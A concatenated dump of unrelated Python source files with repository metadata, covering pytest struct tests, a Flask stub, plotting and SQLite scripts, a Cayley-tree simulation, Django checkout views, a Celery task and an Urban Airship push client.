{"mystery_argument": "value"},
"There were surplus keyword arguments: mystery_argument \n"
"Properties required by this struct are: text, numeric\n"
"Omitted struct properties were defaulted to null: text, numeric",
id="all-fields-defaulted-is-ok-but-surplus-keyword-args-is-bad",
),
],
)
def should_raise_on_encountering_invalid_args(args, kwargs, expected_error_message):
# given
class AnObject(Struct):
text = String(name="alt_name")
numeric = Float()
# when, then
with pytest.raises(StructInstantiationArgumentsError, match=re.escape(expected_error_message)):
AnObject.make_dict(*args, **kwargs)
@staticmethod
@pytest.mark.parametrize(
"args,kwargs,expected_error_message",
[
pytest.param(
[], {"text": None, "numeric": 7}, "Non-nullable field cannot have None value", id="none-in-nullable"
)
],
)
def should_raise_on_encountering_invalid_arg_type(args, kwargs, expected_error_message):
# given
class AnObject(Struct):
text = String(nullable=False)
numeric = Float()
# when, then
with pytest.raises(StructInstantiationArgumentTypeError, match=expected_error_message):
AnObject.make_dict(*args, **kwargs)
@staticmethod
@pytest.mark.parametrize(
"kwargs, expected_error",
[
pytest.param({"text_sequence": None}, does_not_raise(), id="allow-none-in-nullable"),
pytest.param(
{"text_sequence": "this is a string value"},
pytest.raises(
StructInstantiationArgumentTypeError,
match=re.escape(
"Value for an array must not be a string. Found value 'this is a string value'. "
"Did you mean to use a list of strings?"
),
),
id="reject-non-sequence-string-in-array",
),
pytest.param(
{"float_sequence": 5.5},
pytest.raises(
StructInstantiationArgumentTypeError,
match=re.escape("Value for an array must be a sequence, not 'float'"),
),
id="reject-non-sequence-float-in-array",
),
],
)
def test_arrays_should_be_handled_correctly(kwargs, expected_error):
# 2x test cases.
# given
class AnObject(Struct):
text_sequence = Array(String())
float_sequence = Array(Float())
# when, then
with expected_error:
AnObject.make_dict(**kwargs)
| 33.441026
| 116
| 0.579666
|
df5af76319cef47af97bace14d11ec330e499456
| 1,025
|
py
|
Python
|
app/routes/spotify_routes.py
|
Build-Week-Spotify-Song-Suggestor/DS
|
03070f5f0d2f19472b87a401879429f650dc88ec
|
[
"MIT"
] | null | null | null |
app/routes/spotify_routes.py
|
Build-Week-Spotify-Song-Suggestor/DS
|
03070f5f0d2f19472b87a401879429f650dc88ec
|
[
"MIT"
] | null | null | null |
app/routes/spotify_routes.py
|
Build-Week-Spotify-Song-Suggestor/DS
|
03070f5f0d2f19472b87a401879429f650dc88ec
|
[
"MIT"
] | null | null | null |
# app/routes/spotify_routes.py
from flask import Blueprint, jsonify, request
from app.services.spotify_services import spotify_api_client
from app.model.models import db, Songs
spotify_routes = Blueprint('spotify_routes',__name__)
# Todo for today: add route to add new track to database
# @app.route('/add-track')
# def refresh():
# for n_track in tracks:
# track = api.track(n_track)
# result = {'artist':track['artists'][0]['name'],'name': track['name'],
# 'track_id': track['id'], 'popularity':track['popularity']}
# feat = api.audio_features(n_track)
# addon = {'time_signature': feat[0]['time_signature'], 'tempo': feat[0]['tempo'],
# 'instrumentalness': feat[0]['instrumentalness'], 'valence': feat[0]['valence'], 'energy': feat[0]['energy'],
# 'danceability': feat[0]['danceability'], 'loudness': feat[0]['loudness'], 'key': feat[0]['key'], 'analysis_url': feat[0]['analysis_url']}
# result.update(addon)
if __name__ == "__main__":
pass
| 36.607143
| 147
| 0.649756
|
31b830e4147b43f853da5f17d0d40fe0d3a4a595
| 833
|
py
|
Python
|
Chapter06/2logistic_function.py
|
karim7262/Python-Machine-Learning-By-Example
|
1bd2690225c93f637eabc5c78574714a22b4068a
|
[
"MIT"
] | 106
|
2017-06-20T07:06:26.000Z
|
2022-01-28T20:17:57.000Z
|
Chapter06/2logistic_function.py
|
karim7262/Python-Machine-Learning-By-Example
|
1bd2690225c93f637eabc5c78574714a22b4068a
|
[
"MIT"
] | 2
|
2017-11-20T03:36:46.000Z
|
2019-03-08T07:47:02.000Z
|
Chapter06/2logistic_function.py
|
karim7262/Python-Machine-Learning-By-Example
|
1bd2690225c93f637eabc5c78574714a22b4068a
|
[
"MIT"
] | 83
|
2017-07-02T03:09:38.000Z
|
2022-03-07T06:45:04.000Z
|
import numpy as np
def sigmoid(input):
return 1.0 / (1 + np.exp(-input))
import matplotlib.pyplot as plt
z = np.linspace(-8, 8, 1000)
y = sigmoid(z)
plt.plot(z, y)
plt.axhline(y=0, ls='dotted', color='k')
plt.axhline(y=0.5, ls='dotted', color='k')
plt.axhline(y=1, ls='dotted', color='k')
plt.yticks([0.0, 0.25, 0.5, 0.75, 1.0])
plt.xlabel('z')
plt.ylabel('y(z)')
plt.show()
# plot sample cost vs y_hat (prediction), for y (truth) = 1
y_hat = np.linspace(0, 1, 1000)
cost = -np.log(y_hat)
plt.plot(y_hat, cost)
plt.xlabel('Prediction')
plt.ylabel('Cost')
plt.xlim(0, 1)
plt.ylim(0, 7)
plt.show()
# plot sample cost vs y_hat (prediction), for y (truth) = 0
y_hat = np.linspace(0, 1, 1000)
cost = -np.log(1 - y_hat)
plt.plot(y_hat, cost)
plt.xlabel('Prediction')
plt.ylabel('Cost')
plt.xlim(0, 1)
plt.ylim(0, 7)
plt.show()
| 20.317073
| 59
| 0.645858
|
bac30c6b179858b0c577cadcdc234be11a0ce58d
| 1,720
|
py
|
Python
|
projects/python-4-everybody-examples/sqlite-email-addresses/emaildb.py
|
fred-snyder/notes-on-python
|
1837a8999ea0d736ff3804417524b8d8cb1955e6
|
[
"MIT"
] | 1
|
2022-03-15T22:03:45.000Z
|
2022-03-15T22:03:45.000Z
|
projects/python-4-everybody-examples/sqlite-email-addresses/emaildb.py
|
fred-snyder/notes-on-python
|
1837a8999ea0d736ff3804417524b8d8cb1955e6
|
[
"MIT"
] | null | null | null |
projects/python-4-everybody-examples/sqlite-email-addresses/emaildb.py
|
fred-snyder/notes-on-python
|
1837a8999ea0d736ff3804417524b8d8cb1955e6
|
[
"MIT"
] | null | null | null |
import sqlite3
# make connection to sqlite
conn = sqlite3.connect('emaildb.sqlite')
# a cursor allows Python-code to execute SQL commands in a database session
cur = conn.cursor()
# make sure we start with a clean database
cur.execute('DROP TABLE IF EXISTS Counts')
# create a new empty table
cur.execute('''
CREATE TABLE Counts (org TEXT, count INTEGER)''')
# open the data file
fname = input('Enter file name: ')
if (len(fname) < 1): fname = 'mbox.txt'
fh = open(fname)
# loop over lines in the data
for line in fh:
# only work on lines that start with "From: "
if not line.startswith('From: '): continue
# extract email
pieces = line.split()
email = pieces[1]
email_domain = email.split('@')
email_domain = email_domain[1]
#print(email_domain)
# query databse for the count of that email
cur.execute('SELECT count FROM Counts WHERE org = ? ', (email_domain,))
# get the result of that query
row = cur.fetchone()
if row is None: # if the row is empty add 1 new count to that row
cur.execute('''INSERT INTO Counts (org, count)
VALUES (?, 1)''', (email_domain,))
else: # if the row is not empty increment the existing value with 1
cur.execute('UPDATE Counts SET count = count + 1 WHERE org = ?',
(email_domain,))
# commit the changes to the database
conn.commit()
# https://www.sqlite.org/lang_select.html
sqlstr = 'SELECT org, count FROM Counts ORDER BY count DESC LIMIT 10'
# execute the query in the string above
# and print out every line of the result
# the result is a list
for row in cur.execute(sqlstr):
print(str(row[0]), row[1])
# close the database connection
cur.close()
| 29.152542
| 75
| 0.668023
|
c709386c1d32215a85c3c3018e9969e07747c654
| 176
|
py
|
Python
|
Lesson 5/01_functions.py
|
hamburgcodingschool/L2C-Python-1804
|
3420691aaee81fb88b2e8e21763014bc91d2ed96
|
[
"MIT"
] | null | null | null |
Lesson 5/01_functions.py
|
hamburgcodingschool/L2C-Python-1804
|
3420691aaee81fb88b2e8e21763014bc91d2ed96
|
[
"MIT"
] | null | null | null |
Lesson 5/01_functions.py
|
hamburgcodingschool/L2C-Python-1804
|
3420691aaee81fb88b2e8e21763014bc91d2ed96
|
[
"MIT"
] | null | null | null |
def something():
print("something")
print("something else")
print("something other")
if True:
for n in range(1, 10):
print(n)
something()
| 16
| 30
| 0.556818
|
6f5ae1abe96d336522cbe36a5b0f1aed3ef9cbf9
| 17,610
|
py
|
Python
|
research/volume.py
|
Billy-The-Squid/Cayley
|
8e1884358c10e410c3b236d2be700726e84c6df2
|
[
"MIT"
] | null | null | null |
research/volume.py
|
Billy-The-Squid/Cayley
|
8e1884358c10e410c3b236d2be700726e84c6df2
|
[
"MIT"
] | null | null | null |
research/volume.py
|
Billy-The-Squid/Cayley
|
8e1884358c10e410c3b236d2be700726e84c6df2
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
Authors: Justin Pusztay, Sho Gibbs, Will Hanstedt
Filename: volume.py
Project: Research for Irina Mazilu, Ph.D.
Adapted from cayleymain.py module by Justin Pusztay et al.
Runs Cayley tree simulations in bulk according to the methods laid out in
montecarlo.py.
"""
import Cayley as cy
import Cayley.graphics as cg
import Cayley.research as cr
import xlsxwriter as xl
import time
from math import sqrt
from Cayley.research import total_nodes
timesteps = cr.variable('timesteps', int)
node_list = cr.variable('node_list', list, int)
initial_state = cr.variable('initial_state',str)
temp_d = cr.variable('temp_d', dict, float)
## # <-- indicates adjusted generations (account for last gen fluctuations)
def simulate(method, generations, links, alpha, beta, gamma, mu, r1, r2,
trials,k,J):
"""The important one"""
generations = generations + 1 ## #
network = cy.CayleyTree(generations, links)
monte = cy.MonteCarlo(network, alpha, beta, gamma, mu, r1, r2)
run_time = time.time()
endcol = xl.utility.xl_col_to_name(timesteps+1)
a_tag = "%.2f" % alpha
b_tag = "%.2f" % beta
g_tag = "%.2f" % gamma
m_tag = "%.2f" % mu
r1_tag = "%.2f" % r1
r2_tag = "%.2f" % r2
if method == 'NN':
name = ("NN%dGen_%dLin_%sα_%sβ_%sγ.xlsx" % (generations-1, links,
a_tag, b_tag, g_tag))
tags = a_tag+'-'+b_tag+'-'+g_tag
elif method == 'TL':
name = ("TL%dGen_%dLin_%sμ_%sγ.xlsx" % (generations-1, links,
m_tag, g_tag))
tags = m_tag+'-'+g_tag
elif method == 'EI':
name = ("EI%dGen_%dLin_%sr1_%sr2_%sγ.xlsx" % (generations-1, links,
r1_tag, r2_tag, g_tag))
tags = r1_tag+'-'+r2_tag+'-'+g_tag
elif method == 'TM':
tag_list = ()
for s in range(len(temp_d)):
tag_list += ("%.2f"%temp_d[s],)
tags = ("%s_"*(len(temp_d)-1)+"%s") %tag_list
name = ("TM%dGen_%dLin_"%(generations-1,links)+tags+".xlsx")
else: raise ValueError("Method not recognized")
print("\n#### RUNNING SIMULATION %s ####\n"%(name))
workbook = xl.Workbook(name)
#JKP: This all can be incorporated with new node feature ability
density_list = dict() #[trial][timestep] stores overall densities
state_collect = dict() #[trial] stores final state dictionaries
dens_collect = dict() #[trial][generation] stores generational densities
node_d = dict() #[trial#][pair index][node index][timestep] stores node values
overtime = workbook.add_worksheet("Over_Time")
overall = workbook.add_worksheet("Overall")
for m in range(trials):
density_list[m] = [0]*(timesteps+2)
for m in range(trials):
dens_collect[m] = [0]*(generations)
for i in range(trials):
monte.clear()
if method == 'TM': monte.randomSpins()
else:
if initial_state == "empty": monte.emptyDictionary()
elif initial_state == "random": monte.randomDictionary()
elif initial_state == "zero": monte.zeroDictionary()
if method == 'TM':
iterate = len(temp_d)
for d in range (generations+1):
temp = temp_d[d%iterate]
network.addMultipleNodes(network.nodesPerGen(d),temperature=temp)
for t in range(timesteps+1):
if method == 'NN':
monte.simulateNN()
elif method == 'EI':
monte.simulateEI()
elif method == 'TL':
monte.simulateTL(t)
elif method == 'TM':
monte.simulateTemp(k,J)
### FOR RECORDING DATA ###
state_collect[i] = monte.simData(monte.getTimesteps()-1) #JKP updated
node_d[i] = list()
for n in range(len(node_list)):
node_d[i].append([])
for f in range(len(node_list[n])):
node_d[i][n].append([])
for t in range(timesteps+1):
if method == 'TM':
node_d[i][n][f].append((monte.simData(t)[node_list[n][f]]))
else:
node_d[i][n][f].append(2*(monte.simData(t)[node_list[n][f]])-1)
for y in range(monte.getTimesteps()): #JKP: Follows new updates
sum_t = 0 # Sum of relevant nodes at one timestep
for x in range(total_nodes[generations-1][links]): ## # gives adjusted, can't use len(monte.network)
sum_t += monte.simData(y)[x] #JKP: Follows new updates
dens_t = sum_t/total_nodes[generations-1][links] ## # Density at one timestep
density_list[i][y] = dens_t
if trials <= 10: # Trial-by-trial is best for small sets
worksheet = workbook.add_worksheet("Data trial %d" % (i+1))
worksheet.write(0,0,"Timestep")
for x in range(total_nodes[generations-1][links]):## #
worksheet.write(x+1,0,"Node "+str(x))
for y in range(monte.getTimesteps()): #JKP: Follows new updates
worksheet.write(0,y+1,str(y))
for y in range(monte.getTimesteps()): #JKP: Follows new updates
for x in range(total_nodes[generations-1][links]):
worksheet.write(x+1,y+1,monte.simData(y)[x]) #JKP: Follows new updates
worksheet2 = workbook.add_worksheet("Density trial %d" % (i+1))
worksheet2.write(0,0,"Timestep")
worksheet2.write(network.generations+1,0,"Density") ## # #JKP: update
for x in range(network.generations): ## # #JKP: follows update
worksheet2.write(x+1,0,"Gen. "+str(x))
for y in range(timesteps+1):
worksheet2.write(0,y+1,str(y))
for y in range(monte.getTimesteps()): #JKP: Follows new updates
for x in range(network.generations+1): #JKP: Follows new updates
worksheet2.write(x+1,y+1,monte.density(x,monte.simData(y)))
worksheet2.write(network.generations+1,y+1,density_list[i][y]) ## #
if (trials >= 100) and ((10*i)%trials == 0):
try:
ti = (time.time()-run_time)
print("Trial: "+str(i))
print(str(ti)+" secs")
except NameError: pass
corr_t = dict()
for n in range(len(node_list)):
corr_t[n] = [0]*(timesteps+1)
for t in range(timesteps+1):
sum_prod = 0
n1 = 0
n2 = 0
for i in range(trials):
sum_prod += (node_d[i][n][0][t])*(node_d[i][n][1][t])
n1 += node_d[i][n][0][t]
n2 += node_d[i][n][1][t]
corr_t[n][t] = (sum_prod/trials)-(n1/trials)*(n2/trials)
for n in range(len(node_list)): # For recording correlations
sheetname = ("Nodes_%d+%d" %(node_list[n][0],node_list[n][1]))
chartrange = '='+sheetname+'!$B$2:$'+endcol+'$2'
timerange = '='+sheetname+'!$B$2:$'+endcol+'$2'
corr_sheet = workbook.add_worksheet(sheetname)
corr_sheet.write(0,0,"Timestep")
corr_sheet.write(1,0,"Correlation")
corr_chart = workbook.add_chart({'type':'line'})
corr_sheet.insert_chart('I8', corr_chart)
corr_chart.set_title({'name':'Correlation'})
corr_chart.set_x_axis({'name':'Timesteps'})
corr_chart.set_y_axis({'name':'Correlation'})
corr_chart.add_series({'values':chartrange,
'name':'Correlation'})
for t in range(timesteps+1):
corr_sheet.write(0,t+1,t)
corr_sheet.write(1,t+1,corr_t[n][t])
### FOR RECORDING OVERALL DATA ###
overall.write(0,0,"Generation") # For steady-state analysis
for x in range(generations):
overall.write(x+1,0,"Gen. "+str(x))
overall.write(0,1,"Average")
overall.write(0,2,"Std Dev")
for x in range(generations):
if x == 0:
for y in range(trials):
dens_collect[y][x] = monte.density(x,state_collect[y])
else:
for y in range(trials):
dens_collect[y][x] = monte.density(x,state_collect[y])/ \
((links)*(links-1)**(x-1))
if trials <= 10: # Densities per gen for individual trials
for y in range(trials):
overall.write(0,y+4,"Trial "+str(y+1))
overall.write(generations+1,y+4,density_list[y][timesteps])
for x in range(generations):
for y in range(trials):
overall.write(x+1,y+4,dens_collect[y][x])
for x in range(generations): # Average density per generation
list_gen = [] # Temporary variable
for y in range(trials):
list_gen.append(dens_collect[y][x])
av = sum(list_gen)/(trials)
if method == 'TM':
av = (av+1)/2
SD = sqrt((av)*(1-av)/total_nodes[generations-1][links])
if method == 'TM':
SD *= 2
overall.write(x+1,1,str(av))
overall.write(x+1,2,str(SD))
overall.write(generations+1,0,"Total")
tot_sum = 0
for c in range(trials):
tot_sum += density_list[c][timesteps]
tot_av = tot_sum/trials
if method == 'TM':
tot_av = (tot_av+1)/2
SD_all = sqrt((tot_av)*(1-tot_av)/(trials*total_nodes[generations-1][links]))
if method == 'TM':
SD_all *= 2
overall.write(generations+1,1,tot_av)
overall.write(generations+1,2,SD_all)
# Average density over time
overtime.write(0,0,"Timestep")
data_tag = method+" "+str(generations)+" "+str(links)+" "+tags
overtime.write(1,0,data_tag)
chartrange = '=Over_Time!$B$2:$'+endcol+'$2'
over_chart = workbook.add_chart({'type':'line'})
overtime.insert_chart('I8',over_chart)
over_chart.set_title({'name':'Density'})
over_chart.set_x_axis({'name':'Timesteps'})
over_chart.set_y_axis({'name':'Density'})
over_chart.add_series({'values':('=Over_Time!$B$2:$'+endcol+'$2'),
'name':'=Over_Time!$A$2'})
over_chart.add_series({'values':('=Over_Time!$B$3:$'+endcol+'$3'),
'name':'=Over_Time!$A$3'})
over_chart.add_series({'values':('=Over_Time!$B$4:$'+endcol+'$4'),
'name':'=Over_Time!$A$4'})
if trials <= 10:
for t in range(trials):
overtime.write(t+3,0,"Trial "+str(t+1))
for m in range(timesteps+1):
overtime.write(t+3,m+1,density_list[t][m])
if method == 'TM':
overtime.write(6,1,"k: "%(k))
overtime.write(6,2,"J: "%(J))
for i in range(generations+1):
overtime.write(i+6+trials,0,"Generation: "+str(i))
overtime.write(i+6+trials,1,str(temp_d[i]))
else:
overtime.write(6,0,"Trials: "+str(trials))
if method == 'TM':
overtime.write(6,1,"k: "+str(k))
overtime.write(6,2,"J: "+str(J))
overtime.write(8,0,"Temperatures")
for i in range(generations+1):
overtime.write(i+9,0,"Gen: "+str(i))
overtime.write(i+9,1,str(temp_d[i%len(temp_d)]))
for m in range(timesteps+1):
t_sum = 0
overtime.write(0,m+1,m)
for t in range(trials):
t_sum += density_list[t][m]
t_av = t_sum/trials
overtime.write(1,m+1,t_av)
workbook.close()
def main():
print("To change the default timesteps, initial state, temperatures, or"+\
" nodes for comparison, change the values in the change_me.py file.")
print("Enter 'NN', 'TL', 'EI', or 'TM' for nearest neighbors, total " +
"lattice density, empty interval, or temperature methods.")
method = input("Method: ").upper()
generations = int(input("Number of generations: "))
links = int(input("Number of links: "))
trials = int(input("Number of trials: "))
if method == 'NN':
alpha = float(input("Alpha value: "))
beta = float(input("Beta value: "))
gamma = float(input("Value for gamma: "))
mu = r1 = r2 = 0
k_c = J_c = 1
elif method == 'TL':
mu = float(input("Mu value: "))
gamma = float(input("Value for gamma: "))
alpha = beta = r1 = r2 = 0
k_c = J_c = 1
elif method == 'EI':
print("R1 should be less than R2 for electrostatic models.")
r1 = float(input("R1 value: "))
r2 = float(input("R2 value: "))
gamma = float(input("Value for gamma: "))
alpha = beta = mu = 0
k_c = J_c = 1
elif method == 'TM':
print("Retrieving temperatures from change_me.py...")
choose = input("Change k & J values from 1? [Y/N] ").upper()
if choose == 'Y':
k_c = float(input("k value: "))
J_c = float(input("J value: "))
else: k_c = J_c = 1
alpha = beta = gamma = mu = r1 = r2 = 0
else: raise ValueError("Method not recognized")
start_time = time.time()
simulate(method, generations, links, alpha, beta, gamma, mu, r1,r2,trials,k_c,J_c)
print("--- %s seconds ---" % (time.time() - start_time))
def alpha_range(generations, links, beta, gamma, trials):
"""To run tests with a range of alpha values"""
start_time = time.time()
from change_me import alpha_list
for a in alpha_list:
simulate('NN', generations, links, a, beta, gamma, 0, 0, 0, trials, 1, 1)
print("--- runtime is %s seconds ---" % (time.time() - start_time))
def beta_range(generations, links, alpha, gamma, trials):
"""To run tests with a range of beta values"""
start_time = time.time()
from change_me import beta_list
for b in beta_list:
simulate('NN', generations, links, alpha, b, gamma, 0, 0, 0, trials, 1, 1)
print("--- runtime is %s seconds ---" % (time.time() - start_time))
def mu_range(generations, links, gamma, trials):
"""To run tests with a range of mu values"""
start_time = time.time()
from change_me import mu_list
for m in mu_list:
simulate('TL', generations, links, 0, 0, gamma, m, 0, 0, trials, 1, 1)
print("--- runtime is %s seconds ---" % (time.time() - start_time))
def r1_range(generations, links, r2, gamma, trials):
"""To run tests with a range of r1 values"""
start_time = time.time()
from change_me import r1_list
for rt1 in r1_list:
simulate('EI', generations, links, 0, 0, gamma, 0, rt1, r2, trials, 1, 1)
print("--- runtime is %s seconds ---" % (time.time() - start_time))
def r2_range(generations, links, r1, gamma, trials):
"""To run tests with a range of r2 values"""
start_time = time.time()
from change_me import r2_list
for rt2 in r2_list:
simulate('EI', generations, links, 0, 0, gamma, 0, r1, rt2, trials, 1, 1)
print("--- runtime is %s seconds ---" % (time.time() - start_time))
def full(method, generations, links, trials):
"""You'll have data coming out of your ears"""
start_time = time.time()
if method == 'NN':
from change_me import alpha_list
from change_me import beta_list
from change_me import gamma_list
mu = r1 = r2 = 0
for a in alpha_list:
for b in beta_list:
for g in gamma_list:
simulate('NN', generations, links, a, b, g, mu, r1, r2, trials, 1, 1)
elif method == 'EI':
from change_me import r1_list
from change_me import r2_list
from change_me import gamma_list
alpha = beta = mu = 0
for rt1 in r1_list:
for rt2 in r2_list:
for g in gamma_list:
if rt2 >= rt1:
simulate('EI',generations, links, alpha, beta, g,
rt1, rt2, trials, 1, 1)
elif method == 'TL':
from change_me import mu_list
from change_me import gamma_list
alpha = beta = r1 = r2 = 0
for m in mu_list:
for g in gamma_list:
simulate('TL', generations, links, alpha, beta, g, m, r1, r2, trials, 1, 1)
print("--- runtime is %s seconds ---" % (time.time() - start_time))
def no_evaporation(method, generations, links, trials):
"""You'll have slightly unrealistic data coming out of your ears"""
start_time = time.time()
if method == 'NN':
from change_me import alpha_list
from change_me import beta_list
mu = r1 = r2 = 0
for a in alpha_list:
for b in beta_list:
simulate('NN', generations, links, a, b, 0, mu, r1, r2, trials, 1, 1)
elif method == 'EI':
from change_me import r1_list
from change_me import r2_list
alpha = beta = mu = 0
for rt1 in r1_list:
for rt2 in r2_list:
if rt2 >= rt1:
simulate('EI',generations, links, alpha, beta, 0, mu, rt1, rt2, trials, 1, 1)
elif method == 'TL':
from change_me import mu_list
alpha = beta = r1 = r2 = 0
for m in mu_list:
simulate('TL', generations, links, alpha, beta, 0, m, r1, r2, trials)
print("--- runtime is %s seconds ---" % (time.time() - start_time))
if __name__ == "__main__":
main()
## Things to look at/fix:
## Clean up formatting
## Make this able to call the lattice class
## Make sure last gen is clean
## Change progress bar for multiple parameters and trial 0
## Steady-state analysis for more timesteps?
## Make sure I'm doing standard deviation correctly
| 41.048951
| 112
| 0.566667
|
80ecf5fdfee7913776346e9b631a7b918e035cd7
| 4,506
|
py
|
Python
|
src/addresses/views.py
|
caesarorz/complete-ecommerce
|
35493812167c208c166df3048190a9988adf6bb0
|
[
"MIT"
] | null | null | null |
src/addresses/views.py
|
caesarorz/complete-ecommerce
|
35493812167c208c166df3048190a9988adf6bb0
|
[
"MIT"
] | null | null | null |
src/addresses/views.py
|
caesarorz/complete-ecommerce
|
35493812167c208c166df3048190a9988adf6bb0
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render,redirect
from django.utils.http import is_safe_url
from .forms import AddressForm
from .models import Address
# Create your views here.
from billing.models import BillingProfile
def checkout_address_create_view(request):
form = AddressForm(request.POST or None)
context = {
"form": form
}
print(form)
next_ = request.GET.get('next')
next_post = request.POST.get('next')
redirect_path = next_ or next_post or None
if form.is_valid():
instance = form.save(commit=False)
billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
if billing_profile is not None:
address_type = request.POST.get('address_type', 'shipping')
instance.billing_profile = billing_profile
instance.address_type = address_type
instance.save()
request.session[address_type + "_address_id"] = instance.id
print(address_type + "_address_id")
else:
print("Error here")
return redirect("cart:checkout")
if is_safe_url(redirect_path, request.get_host()):
return redirect(redirect_path)
else:
print("\n\n**********************Not valid form")
return redirect("cart:checkout")
def checkout_address_reuse_view(request):
if request.user.is_authenticated():
context = {}
next_ = request.GET.get('next')
next_post = request.POST.get('next')
redirect_path = next_ or next_post or None
if request.method == 'POST':
shipping_address = request.POST.get('shipping_address', None)
address_type = request.POST.get('address_type', 'shipping')
billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
if shipping_address is not None:
qs = Address.objects.filter(billing_profile=billing_profile, id=shipping_address)
if qs.exists():
request.session[address_type + "_address_id"] = shipping_address
if is_safe_url(redirect_path, request.get_host()):
return redirect(redirect_path)
return redirect("cart:checkout")
#
# def checkout_address_create_view(request):
# print("checkout_address_create_view ",request)
# form = AddressForm(request.POST or None)
# context = {
# "form":form
# }
# next_ = request.GET.get('next')
# next_post = request.POST.get('next')
# redirect_path = next_ or next_post or None
#
# if form.is_valid():
# print("addresses.views.py request.POST",request.POST)
# instance=form.save(commit=False)
# billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
# if billing_profile is not None:
# address_type = request.POST.get('address_type','shipping')
# print("addresses.views.py address_type",address_type)
# instance.billing_profile = billing_profile
# instance.address_type = address_type
# instance.save()
# request.session[address_type + '_address_id'] = instance.id
# print("addresses.views.py address_type ",address_type + '_address_id')
# else:
# print("Error here")
# return redirect('cart:checkout')
# if is_safe_url(redirect_path, request.get_host()):
# return redirect(redirect_path)
# return redirect('cart:checkout')
#
# def checkout_address_reuse_view(request):
# if request.user.is_authenticated():
# context = {}
# next_ = request.GET.get('next')
# next_post = request.POST.get('next')
# redirect_path = next_ or next_post or None
# if request.method == 'POST':
# shipping_address = request.POST.get('shipping_address', None)
# address_type = request.POST.get('address_type','shipping')
# billing_profile, billing_profile_created = BillingProfile.objects.new_or_get(request)
# if shipping_address is not None:
# qs = Address.objects.filter(billing_profile=billing_profile,id=shipping_address)
# if qs.exists():
# request.session[address_type + '_address_id'] = shipping_address
# if is_safe_url(redirect_path, request.get_host()):
# return redirect(redirect_path)
# return redirect('cart:checkout')
| 42.509434
| 99
| 0.638704
|
5b15ee3bcc5749c20d41636c569fa2e558cd7420
| 850
|
py
|
Python
|
tel_storage/tasks.py
|
nalimhahs/pwnit
|
b0752cb1c7e981addb3b3b57aa444c5823a911f6
|
[
"MIT"
] | null | null | null |
tel_storage/tasks.py
|
nalimhahs/pwnit
|
b0752cb1c7e981addb3b3b57aa444c5823a911f6
|
[
"MIT"
] | 10
|
2021-03-19T04:34:51.000Z
|
2022-03-12T00:44:21.000Z
|
tel_storage/tasks.py
|
nalimhahs/pwnit
|
b0752cb1c7e981addb3b3b57aa444c5823a911f6
|
[
"MIT"
] | null | null | null |
from config import celery_app
from movies.models import Movie
from django.conf import settings
import json
import requests
@celery_app.task()
def upload_movie(movie_pk):
movie = Movie.objects.get(pk=movie_pk)
movie.set_status(Movie.UPLOADING)
response = requests.post(
settings.STREAM_SERVER_URL + "/upload",
data={"file_path": movie.file_location, "movie_id": movie.pk},
)
if response.status_code in (200, 201, 202):
movie.set_status(Movie.UPLOAD_COMPLETE)
movie.tel_message_id = json.loads(response.text)["message_id"]
movie.set_status(Movie.READY)
return movie
@celery_app.task()
def auto_upload_movie():
downloaded = Movie.objects.filter(status=Movie.DOWNLOAD_COMPLETE)
for movie in downloaded:
upload_movie.delay(movie.pk)
return {"downloaded": downloaded}
| 29.310345
| 70
| 0.718824
|
7dd3346e36f070e41974fd9d11a94f06cb797477
| 8,425
|
py
|
Python
|
urbanairship.py
|
mattmakai/python-library
|
6decb024e73f112f71d20e2223e18afdf3499ffc
|
[
"BSD-2-Clause"
] | 1
|
2022-02-06T16:27:19.000Z
|
2022-02-06T16:27:19.000Z
|
urbanairship.py
|
mattmakai/python-library
|
6decb024e73f112f71d20e2223e18afdf3499ffc
|
[
"BSD-2-Clause"
] | null | null | null |
urbanairship.py
|
mattmakai/python-library
|
6decb024e73f112f71d20e2223e18afdf3499ffc
|
[
"BSD-2-Clause"
] | null | null | null |
"""Python module for using the Urban Airship API"""
import httplib
import urllib
try:
import simplejson as json
except ImportError:
import json
SERVER = 'go.urbanairship.com'
BASE_URL = "https://go.urbanairship.com/api"
DEVICE_TOKEN_URL = BASE_URL + '/device_tokens/'
APIDS_TOKEN_URL = BASE_URL + '/apids/'
PUSH_URL = BASE_URL + '/push/'
BATCH_PUSH_URL = BASE_URL + '/push/batch/'
BROADCAST_URL = BASE_URL + '/push/broadcast/'
FEEDBACK_URL = BASE_URL + '/device_tokens/feedback/'
class Unauthorized(Exception):
"""Raised when we get a 401 from the server"""
class AirshipFailure(Exception):
"""Raised when we get an error response from the server.
args are (status code, message)
"""
class AirshipList(object):
"""Parent class that represents a list of iOS devices or
Android C2DM APIDs. Only meant to be used by subclasses.
"""
def __init__(self, airship):
self._airship = airship
class AirshipDeviceList(AirshipList):
"""Iterator that fetches and returns a list of iOS device tokens
Follows pagination.
"""
def __init__(self, airship):
super(AirshipDeviceList, self).__init__(airship)
self._load_page(DEVICE_TOKEN_URL)
def __len__(self):
return self._page['device_tokens_count']
def _load_page(self, url):
status, response = self._airship._request('GET', None, url)
if status != 200:
raise AirshipFailure(status, response)
self._page = page = json.loads(response)
self._token_iter = iter(page['device_tokens'])
class AirshipAPIDsList(AirshipList):
"""Iterator that fetches and returns a list of Android
C2DM APIDs.
"""
def __init__(self, airship):
super(AirshipAPIDsList, self).__init__(airship)
self._load_page(APIDS_TOKEN_URL)
def __len__(self):
return len(self._page['apids'])
def _load_page(self, url):
status, response = self._airship._request('GET', None, url)
if status != 200:
raise AirshipFailure(status, response)
self._page = page = json.loads(response)
self._token_iter = iter(page['apids'])
class Airship(object):
def __init__(self, key, secret):
self.key = key
self.secret = secret
self.auth_string = ('%s:%s' % (key, secret)).encode('base64')[:-1]
def _request(self, method, body, url, content_type=None):
h = httplib.HTTPSConnection(SERVER)
headers = {
'authorization': 'Basic %s' % self.auth_string,
}
if content_type:
headers['content-type'] = content_type
h.request(method, url, body=body, headers=headers)
resp = h.getresponse()
if resp.status == 401:
import pdb; pdb.set_trace()
raise Unauthorized
return resp.status, resp.read()
def register(self, device_token, alias=None, tags=None, badge=None):
"""Register the device token with UA."""
url = DEVICE_TOKEN_URL + device_token
payload = {}
if alias is not None:
payload['alias'] = alias
if tags is not None:
payload['tags'] = tags
if badge is not None:
payload['badge'] = badge
if payload:
body = json.dumps(payload)
content_type = 'application/json'
else:
body = ''
content_type = None
status, response = self._request('PUT', body, url, content_type)
if not status in (200, 201):
